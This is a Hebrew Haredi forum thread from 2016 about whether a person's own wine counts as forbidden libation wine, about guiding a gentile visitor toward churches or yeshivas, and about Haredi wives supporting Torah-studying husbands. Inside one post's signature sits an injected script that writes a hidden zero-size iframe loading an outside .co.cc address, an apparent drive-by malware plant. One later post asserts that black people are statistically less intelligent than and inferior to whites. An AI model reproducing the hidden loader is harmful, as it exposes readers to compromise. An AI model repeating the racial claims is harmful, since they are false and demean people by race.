בית פורומים עצור כאן חושבים

ייני יין נסך

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-28/4/2016 12:16 לינק ישיר 

מיימוני כתב:

אנחנו זכינו להבין מה שאחרים אינם מבינים. האם זו סיבה לחוש עליונות - או אחריות? האם זו סיבה לריב איתם? להוציא עליהם את התיסכול שלנו מחמת זה שאנו אוהבים אותם ורואים שהם טועים אבל קשה לנו להוציא אותם מטעותם ואת הטעות מהם?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

כעקרון אתה צודק, למרות שאני חושבת שהקצנת את המצב, אני מעריכה את מסירות הנפש של גיסי ללמוד התורה, ואני לא מרגישה עליונות עליו.
אבל היות שציינת שאין זה מעניין הפורום, אציג בפניך ויכוח שהיה ביני לבין גיסי לפני כשנה, וזה נראה לי כן מעניין הפורום, ועד היום אני לא יודעת מי צודק, אני או גיסי.

המעסיקים שאני עובדת עבורם הם יהודים מארה"ב, אחד המשפטנים שלהם שם בארה"ב הינו גוי שבעקבות העבודה עם יהודים התעורר מאוד לנושא הדת, לפני כשנה הוא הגיע לארץ, הוא ניצל את הביקור בשביל כמה ימי דת, ואני הייתי האחראית לתיור שלו, ולהשתוקקות הדתית שלו, אני כוונתי אותו בעיקר למקומות דת נוצריות, בחושבי שעדיף ואין רע בכך שיחזק את הנצרות שלו שבסך הכל במאה שנים האחרונות הביא רק קידמה ודברים חיוביים למאמינים שנמנים על דתם,
הברנש מאוד רצה להכיר מקרוב מקומות של יהודים ישיבות ובתי כנסת, הוא רצה גם לבקר רבנים יהודים, לבסוף נאלצתי לבקש את עזרת גיסי בשביל להראות לו רבנים השוקדים על תורתם בהיכלי הישיבות, ולהפגיש אותו עם רבנים מזקני הציבור (לא היה פשוט, אין לנו פתיחות למפגשים שכאלו, רק בציבור כיפות הסרוגות הצלחתי בקלות ליצור שני מפגשים, אבל הוא דרש הסבר על כל מגזר ורצה לפגוש גם אולטרה אורתודוקס),

בקיצור בטיפשותי אמרתי לגיסי, שגוי שרוצה להתחזק בדת צריך לקחת אותו לכומר בכנסיה וזה מה שיעשה לנשמה שלו טוב, אבל מה לעשות שהוא מתעקש. מאז יש לגיסי סיבה נוספת שלא לשתות את היין שאני נוגעת בו, היות שאני גם מאמינה בעבודה זרה אמיתיס ממש (כלשונו).

האם הוא צודק בדרך שבו הייתי צריכה לכוון את הגוי (שאגב הוא חצי כושי, רק חכם שיכול גם להיות נשיא ארה"ב)

דדווח על תוכן פוגעני

נשלח ב-28/4/2016 13:54 לינק ישיר 

פיילין_שרה כתב:
פייליןהתייחסת לכמה כסף מביאים הביתה.   זו הנקודה?אם אני מביא פי 10 מאשתי היא צריכה לצחצח לי נעליים?

כששני הצדדים מפרנסים, אין כאן שאלה מי מביא כמה,
כשהבעל מפרנס והאשה מגדלת מבשלת ומכבסת אין כאן שאלה מי מביא כמה
כשהאשה מפרנסת, והבעל מכבס מנקה ומגדל אין כאן שאלה מי מביא כמה

אבל כשהאשה עושה הכל (ומביאה דירה) דבריך קצת תמוהים

העניין הוא שיש סיבה כלשהי שבגללה הנשים החרדיות מפרנסות ומביאות דירה, קוראים לה ערך התורה. אם האשה לא מאמינה בזה הרי בשבילה הבעל הוא אכן פרזיט נתעב, אבל אם כן התמיהה היא עליה שבחרה להתחתן איתו בידיעה מראש שבכך הוא מעוניין.

דדווח על תוכן פוגעני

נשלח ב-28/4/2016 15:47 לינק ישיר 

ולנושא האשכול, כבר חקרו כאן בעבר האם עלינו להימנע משתיית יין שנגענו בו.

דדווח על תוכן פוגעני

נשלח ב-2/5/2016 13:01 לינק ישיר 

ונותרה השאלה מה חמור יותר
אחרי שברכתי על היין, לא לשתות אותו מחשש יין נסך, או שברכה לבטלה חמירא טפי?

דדווח על תוכן פוגעני

נשלח ב-2/5/2016 13:29 לינק ישיר 

פיילין
לגבי שאלתך עם הגוי איני יודע. אבל במשפט האחרון שלך בסוגריים יש הרבה חבוי.
א. גזענות סמויה, לאמר שהעובדה שהוא חצי כושי אינה אומרת שהוא טיפש כי הוא דווקא חכם....
ב. שבשביל להיות נשיא ארצות הברית צריך להיות חכם. ואני מכיר נשיא כושי שאיננו חכם גדול וגם לא טיפש קטן. ובכלל יש מהמפלגה הדמוקרטית החושבים ששרה פיילין אינה חכמה כל כך אף שהיתה מועמדת לסגנית הנשיאה...

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-2/5/2016 16:24 לינק ישיר 

שרה

אני חושב שגם לגבי גויים עלינו כיהודים קודם כל לזכור שהיהדות לא פחות טובה מהנצרות - ובכל מקרה היא תרבותו של עמנו, ואיננו צריכים להתבייש בה. זה נכון שנספחו לה כל מיני תוספות ראויות יותר או ראויות פחות, מה שגורם לכל מיני אנשים (ביניהם גם אני) להרגיש לא נוח, אבל גם את זה אני חושב שאפשר להסביר. מבחינתי "כלל ישראל" איננו האורתודוכסים, אלא כלל המאמינים באורתודוכסיה (ואכמ"ל). ולכן חוזקו ותרבותו של עמנו שרירים וקיימים עד היום הזה, ועוד ימשיכו להיות קיימים הרבה זמן.  

לא הבנתי מדוע את חושבת שהנצרות היא המקור לקידמה האירופאית בזמן האחרון. כמובן שיש בנצרות דברים חיוביים, ואדם - גוי - שזה מה שמתאים לו - הרי שזה מה שיתאים להראות לו. אבל "מותר" גם להראות לו את היהדות. וכמובן שאם השאלה היא עקרונית "גוי שרוצה להתחזק בדת" - אזי אני לא מבין למה "חייבים" להביא אותו לכומר. אני חושב שאילו הייתי אני שם, הייתי מוסיף ומסביר לו בקצרה את דעותיי העצכחיות (וכי גם בזה צריך להתבייש?) - זה לדעתי יעשה לו עוד יותר טוב לנשמה. 

דדווח על תוכן פוגעני

נשלח ב-2/5/2016 18:18 לינק ישיר 

בעלבעמיו כתב:

(מדמיין את השאלה שלך בטור "שו"ת SMS כלשהו. משהו בסגנון: כבוד הרב, אני מחלל שבת בפרהסיה, פתחתי בקבוק יין וברכתי על הכוס - וכעת אני חושש: מותר לי לשתות מהיין, למרות שהוא כיין נסך? צריך לשפוך אותו למרות שיש חשש לברכה לבטלה?
אתה מוזמן לנסות לנסח בעצמך תשובה מהרב אבינר, או מהרב שמואל אליהו...)

דדווח על תוכן פוגעני

נשלח ב-2/5/2016 22:24 לינק ישיר 

גם אני חושב שהדברים הקשים שכתבה שרה על רוב הגברים החרדים, אינם נכונים, ואני משער שמתוך כאבה ונהמת לבה כתבה כן.
לעניין היין, יש לי שכן חמוד וצדיק, שמאז שגיליתי לו שאני חושש לשתות את היין שנגעתי בו, מקפיד בכל הזדמנות לשתות מייני ולכבד אותי למזוג לו יין...

דדווח על תוכן פוגעני

נשלח ב-3/5/2016 13:02 לינק ישיר 

שתי תשובות אפשריות
עצם התלבטותך וחששך מברכה לבטלה מוכיחה שאתה מאמין וממילא יינך אינו יין נסך.

הברכה שלך ממילא אינה שווה כלום, ולכן תשפוך את היין ואל תחוש לברכה לבטלה.

דדווח על תוכן פוגעני

נשלח ב-3/5/2016 14:40 לינק ישיר 

אריאל73 כתב:
פייליןהתייחסת לכמה כסף מביאים הביתה.   זו הנקודה?אם אני מביא פי 10 מאשתי היא צריכה לצחצח לי נעליים?

כששני הצדדים מפרנסים, אין כאן שאלה מי מביא כמה,
כשהבעל מפרנס והאשה מגדלת מבשלת ומכבסת אין כאן שאלה מי מביא כמה
כשהאשה מפרנסת, והבעל מכבס מנקה ומגדל אין כאן שאלה מי מביא כמה

אבל כשהאשה עושה הכל (ומביאה דירה) דבריך קצת תמוהים

העניין הוא שיש סיבה כלשהי שבגללה הנשים החרדיות מפרנסות ומביאות דירה, קוראים לה ערך התורה. אם האשה לא מאמינה בזה הרי בשבילה הבעל הוא אכן פרזיט נתעב, אבל אם כן התמיהה היא עליה שבחרה להתחתן איתו בידיעה מראש שבכך הוא מעוניין.

יש 2 בעיות בעניין הזה, 1. בשורה התחתונה האשה היא העדיין המכשיר שמאפשר לבעל לעשות את הדבר החשוב - ללמוד תורה - יחד עם הדירה והכלים יש אשה שמביאה פרנסה, 2. בסופו של דבר יש פה חינוך לאידיאל רומנטי וכניסה למחויבות ארוכת טווח של בחורות (ובחורים) צעירות, לאחר שהקשיים מתבריים בהמשך הדרך הברירות מצומצמות מאוד.
מן הסתם יש הסברים להכל, אבל בהרבה תחומים נראה שהחינוך החרדי בנוי כך, שכאשר יבואו הקשיים לא תהיה (כמעט) ברירה אלא להמשיך בתלם.

דדווח על תוכן פוגעני

נשלח ב-3/5/2016 14:43 לינק ישיר 

ולגבי יחס לנשים בציבור החרדי, לא מתייחסים אליהם כשפחות כמובן (גסי רוח יש מכל מין ומגזר) אבל החינוך החרדי לנשים ולגברים כן מטיף לנחיתותה של האשה ולחובתה לציית ולשרת את בעלה.

דדווח על תוכן פוגעני

נשלח ב-9/5/2016 13:45 לינק ישיר 

אריאל73 כתב:
פייליןהתייחסת לכמה כסף מביאים הביתה.   זו הנקודה?אם אני מביא פי 10 מאשתי היא צריכה לצחצח לי נעליים?כששני הצדדים מפרנסים, אין כאן שאלה מי מביא כמה,כשהבעל מפרנס והאשה מגדלת מבשלת ומכבסת אין כאן שאלה מי מביא כמהכשהאשה מפרנסת, והבעל מכבס מנקה ומגדל אין כאן שאלה מי מביא כמהאבל כשהאשה עושה הכל (ומביאה דירה) דבריך קצת תמוהיםהעניין הוא שיש סיבה כלשהי שבגללה הנשים החרדיות מפרנסות ומביאות דירה, קוראים לה ערך התורה. אם האשה לא מאמינה בזה הרי בשבילה הבעל הוא אכן פרזיט נתעב, אבל אם כן התמיהה היא עליה שבחרה להתחתן איתו בידיעה מראש שבכך הוא מעוניין.

אלך להיכלי הישיבות והכוללים ואבדוק עבורך האם עשרה או עשרים אחוז עומדים בקריטריון של אדם הממית עצמו בעולמו של תורה, אולי גם אשלח לך סירטונים מהנעשה מחוץ לשטיבלעך בשעות 9-11 בבוקר, כמה קשה למצוא בחור בן עלייה אמיתי שבאמת מצדיק לתת לו את ביתך המהוללת 

דדווח על תוכן פוגעני

נשלח ב-9/5/2016 14:36 לינק ישיר 

טעותסופר כתב:
פיילין
לגבי שאלתך עם הגוי איני יודע. אבל במשפט האחרון שלך בסוגריים יש הרבה חבוי.
א. גזענות סמויה, לאמר שהעובדה שהוא חצי כושי אינה אומרת שהוא טיפש כי הוא דווקא חכם....
ב. שבשביל להיות נשיא ארצות הברית צריך להיות חכם. ואני מכיר נשיא כושי שאיננו חכם גדול וגם לא טיפש קטן. ובכלל יש מהמפלגה הדמוקרטית החושבים ששרה פיילין אינה חכמה כל כך אף שהיתה מועמדת לסגנית הנשיאה...

נשלח מהאנדרואיד שלי

מה לעשות שסטטיסטית כושי פחות חכם מלבן, עובדה שלא היית צריך לשאול את עצמך אולי כוונתי הייתה שהוא לא כל כך חכם בגלל החצי השני שלו - החצי הלא כושי.

אני לא גזענית, עובדה אני מכבדת כושים למרות שהם נחותים מהלבנים. ובחיים לא הייתי מבזה יהודי בפולין שלפני המלחמה, למרות שהרבה מהם הצדיקו רגשית את האנטישמיות.

ובאשר לשרה פיילין אכן בגלל שהיא לא חכמה היא נוצרייה אדוקה, וזה מה שגורם לי לרצות אותה בעמדת השפעה, בפרט שהיא מעריכה יהדות 

דדווח על תוכן פוגעני

נשלח ב-9/5/2016 14:46 לינק ישיר 

בעלבעמיו כתב:

עדיף לשתות, כי יין נסך מטמטם את הלב ולא תוכל יותר לעצור ולחשוב, וממילא לא תוכל להיחשב אפיקורס

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > ייני יין נסך
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 סך הכל 2 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. בקטגוריית דת ואמונה אתם מוזמים להיכנס ולדון על כל נושא שעולה לכם בקשר לדת היהודית. שו''ת בנושאי הלכה, פרשנות לתורה ולמקרא, גאולה, אחרית הימים ועוד.